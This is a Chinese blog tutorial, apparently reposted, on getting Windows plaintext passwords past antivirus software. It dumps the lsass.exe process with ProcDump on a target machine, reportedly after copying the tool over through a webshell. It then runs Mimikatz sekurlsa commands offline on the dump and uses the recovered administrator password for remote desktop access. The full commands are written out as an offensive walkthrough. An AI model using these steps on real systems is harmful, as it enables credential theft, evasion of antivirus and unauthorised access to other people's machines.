当前位置:   article > 正文

利用procdump+Mimikatz绕过杀软获取Windows明文密码_prodump mimikataz

prodump mimikataz

利用procdump+Mimikatz绕过杀软获取Windows明文密码

1.原理

Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取

而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀

ProDump下载地址:

ProDump下载


2.实操部分

将工具拷贝到目标机器上,哥斯拉展示如下:

在这里插入图片描述

执行如下命令(需要管理员权限):

ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
  • 1

dump成功:

在这里插入图片描述

下载到本地,开始使用Mimikatz进行分析:

mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
  • 1

在这里插入图片描述

获取的信息中,得到管理员账户和密码,可以直接远程桌面连接:

在这里插入图片描述

为了方便也可以直接输出到密码本:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"> password.txt exit
  • 1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Gausst松鼠会/article/detail/690254
推荐阅读
相关标签
  

闽ICP备14008679号